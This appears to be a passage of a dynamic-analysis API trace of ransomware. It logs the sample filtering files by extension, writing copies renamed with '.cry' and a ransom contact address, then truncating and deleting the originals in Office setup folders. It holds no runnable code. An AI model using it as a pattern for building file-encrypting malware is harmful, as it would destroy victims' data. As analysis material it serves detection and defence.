[0040.127] lstrlenW (lpString=".xlsx") returned 5 [0040.127] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.127] lstrlenW (lpString=".ppt") returned 4 [0040.127] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.127] lstrlenW (lpString=".zip") returned 4 [0040.127] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.127] lstrlenW (lpString=".rar") returned 4 [0040.127] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.127] lstrlenW (lpString=".bz2") returned 4 [0040.127] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.127] lstrlenW (lpString=".7z") returned 3 [0040.127] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.127] lstrlenW (lpString=".dbf") returned 4 [0040.127] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.127] lstrlenW (lpString=".1cd") returned 4 [0040.127] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.127] lstrlenW (lpString=".jpg") returned 4 [0040.127] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.127] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.127] lstrlenW (lpString=".doc") returned 4 [0040.127] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.127] lstrlenW (lpString=".docx") returned 5 [0040.127] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0040.127] lstrlenW (lpString=".pdf") returned 4 [0040.127] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.127] lstrlenW (lpString=".xls") returned 4 [0040.127] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.127] lstrlenW (lpString=".xlsx") returned 5 [0040.127] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0040.128] lstrlenW (lpString=".ppt") returned 4 [0040.128] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.128] lstrlenW (lpString=".zip") returned 4 [0040.128] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.128] lstrlenW (lpString=".rar") returned 4 [0040.128] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.128] lstrlenW (lpString=".bz2") returned 4 [0040.128] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.128] lstrlenW (lpString=".7z") returned 3 [0040.128] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.128] lstrlenW (lpString=".dbf") returned 4 [0040.128] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.128] lstrlenW (lpString=".1cd") returned 4 [0040.128] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.128] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Groove.en-us\\GrooveMUI.XML") returned 106 [0040.128] lstrlenW (lpString=".jpg") returned 4 [0040.128] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.128] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.128] lstrlenW (lpString="SETUP.XML") returned 9 [0040.129] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.325] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=1852) returned 1 [0040.325] CloseHandle (hObject=0x180) returned 1 [0040.325] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml")) returned 0x20 [0040.325] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.325] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.326] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.326] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.326] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0040.326] GetLastError () returned 0x0 [0040.326] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x73c, lpOverlapped=0x0) returned 1 [0040.500] WriteFile (in: hFile=0x18c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x740, lpOverlapped=0x0) returned 1 [0040.500] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0040.500] WriteFile (in: hFile=0x18c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.501] SetEndOfFile (hFile=0x18c) returned 1 [0040.501] CloseHandle (hObject=0x18c) returned 1 [0040.501] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.501] SetEndOfFile (hFile=0x180) returned 1 [0040.502] CloseHandle (hObject=0x180) returned 1 [0040.502] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.502] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml")) returned 1 [0040.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.502] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.502] lstrlenW (lpString=".doc") returned 4 [0040.503] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.503] lstrlenW (lpString=".docx") returned 5 [0040.503] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.503] lstrlenW (lpString=".pdf") returned 4 [0040.503] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.503] lstrlenW (lpString=".xls") returned 4 [0040.503] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.503] lstrlenW (lpString=".xlsx") returned 5 [0040.503] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.503] lstrlenW (lpString=".ppt") returned 4 [0040.503] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.503] lstrlenW (lpString=".zip") returned 4 [0040.503] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.503] lstrlenW (lpString=".rar") returned 4 [0040.503] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.503] lstrlenW (lpString=".bz2") returned 4 [0040.503] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.503] lstrlenW (lpString=".7z") returned 3 [0040.503] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.503] lstrlenW (lpString=".dbf") returned 4 [0040.503] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.503] lstrlenW (lpString=".1cd") returned 4 [0040.503] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.503] lstrlenW (lpString=".jpg") returned 4 [0040.503] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.503] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.503] lstrlenW (lpString=".doc") returned 4 [0040.503] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.503] lstrlenW (lpString=".docx") returned 5 [0040.503] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.503] lstrlenW (lpString=".pdf") returned 4 [0040.503] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.503] lstrlenW (lpString=".xls") returned 4 [0040.503] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.504] lstrlenW (lpString=".xlsx") returned 5 [0040.504] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.504] lstrlenW (lpString=".ppt") returned 4 [0040.504] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.504] lstrlenW (lpString=".zip") returned 4 [0040.504] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.504] lstrlenW (lpString=".rar") returned 4 [0040.504] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.504] lstrlenW (lpString=".bz2") returned 4 [0040.504] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.504] lstrlenW (lpString=".7z") returned 3 [0040.504] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.504] lstrlenW (lpString=".dbf") returned 4 [0040.504] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.504] lstrlenW (lpString=".1cd") returned 4 [0040.504] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.504] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML") returned 104 [0040.504] lstrlenW (lpString=".jpg") returned 4 [0040.504] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.504] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.504] lstrlenW (lpString="SETUP.XML") returned 9 [0040.504] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.513] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=4207) returned 1 [0040.513] CloseHandle (hObject=0x180) returned 1 [0040.513] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml")) returned 0x20 [0040.513] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.513] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.513] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.513] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.513] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0040.514] GetLastError () returned 0x0 [0040.514] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x106f, lpOverlapped=0x0) returned 1 [0040.537] WriteFile (in: hFile=0x18c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x1070, lpOverlapped=0x0) returned 1 [0040.539] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0040.539] WriteFile (in: hFile=0x18c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xe6, lpOverlapped=0x0) returned 1 [0040.539] SetEndOfFile (hFile=0x18c) returned 1 [0040.540] CloseHandle (hObject=0x18c) returned 1 [0040.540] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.540] SetEndOfFile (hFile=0x180) returned 1 [0040.541] CloseHandle (hObject=0x180) returned 1 [0040.541] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0040.541] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\outlook.en-us\\setup.xml")) returned 1 [0040.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.542] lstrlenW (lpString=".doc") returned 4 [0040.542] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.542] lstrlenW (lpString=".docx") returned 5 [0040.542] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.542] lstrlenW (lpString=".pdf") returned 4 [0040.542] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.542] lstrlenW (lpString=".xls") returned 4 [0040.542] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.542] lstrlenW (lpString=".xlsx") returned 5 [0040.542] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.542] lstrlenW (lpString=".ppt") returned 4 [0040.542] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.542] lstrlenW (lpString=".zip") returned 4 [0040.542] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.542] lstrlenW (lpString=".rar") returned 4 [0040.542] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.542] lstrlenW (lpString=".bz2") returned 4 [0040.542] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.542] lstrlenW (lpString=".7z") returned 3 [0040.542] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.542] lstrlenW (lpString=".dbf") returned 4 [0040.542] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.542] lstrlenW (lpString=".1cd") returned 4 [0040.542] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.542] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.542] lstrlenW (lpString=".jpg") returned 4 [0040.542] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.543] lstrlenW (lpString=".doc") returned 4 [0040.543] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0040.543] lstrlenW (lpString=".docx") returned 5 [0040.543] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1 [0040.543] lstrlenW (lpString=".pdf") returned 4 [0040.543] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0040.543] lstrlenW (lpString=".xls") returned 4 [0040.543] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0040.543] lstrlenW (lpString=".xlsx") returned 5 [0040.543] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1 [0040.543] lstrlenW (lpString=".ppt") returned 4 [0040.543] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0040.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.543] lstrlenW (lpString=".zip") returned 4 [0040.543] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0040.543] lstrlenW (lpString=".rar") returned 4 [0040.543] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0040.543] lstrlenW (lpString=".bz2") returned 4 [0040.543] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0040.543] lstrlenW (lpString=".7z") returned 3 [0040.543] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0040.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.543] lstrlenW (lpString=".dbf") returned 4 [0040.543] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0040.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.543] lstrlenW (lpString=".1cd") returned 4 [0040.543] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0040.543] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Outlook.en-us\\SETUP.XML") returned 103 [0040.543] lstrlenW (lpString=".jpg") returned 4 [0040.543] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0040.543] lstrcmpiW (lpString1=".XML", lpString2=".cry") returned 1 [0040.543] lstrlenW (lpString="PrjProrWW.XML") returned 13 [0040.544] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.573] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2edff1c | out: lpFileSize=0x2edff1c*=6421) returned 1 [0040.573] CloseHandle (hObject=0x180) returned 1 [0040.573] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml")) returned 0x20 [0040.573] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0040.573] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0040.573] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.573] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.573] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\PRJPROR\\PrjProrWW.XML.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\prjpror\\prjprorww.xml.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x18c [0040.574] GetLastError () returned 0x0 [0040.574] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x1915, lpOverlapped=0x0) returned 1 [0040.583] WriteFile (in: hFile=0x18c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x1920, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0x1920, lpOverlapped=0x0) returned 1 [0040.583] ReadFile (in: hFile=0x180, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2edfed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x2edfed4*=0x0, lpOverlapped=0x0) returned 1 [0040.584] WriteFile (in: hFile=0x18c, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x2edfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x2edfc9c*=0xee, lpOverlapped=0x0) returned 1 [0040.584] SetEndOfFile (hFile=0x18c) returned 1 [0040.584] CloseHandle (hObject=0x18c) returned 1 [0040.585] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2edfec8 | out: lpNewFilePointer=0x0) returned 1 [0040.585] SetEndOfFile (hFile=0x180) returned 1 [0040.585] CloseHandle (hObject=0x180) returned 1 [0040.585] 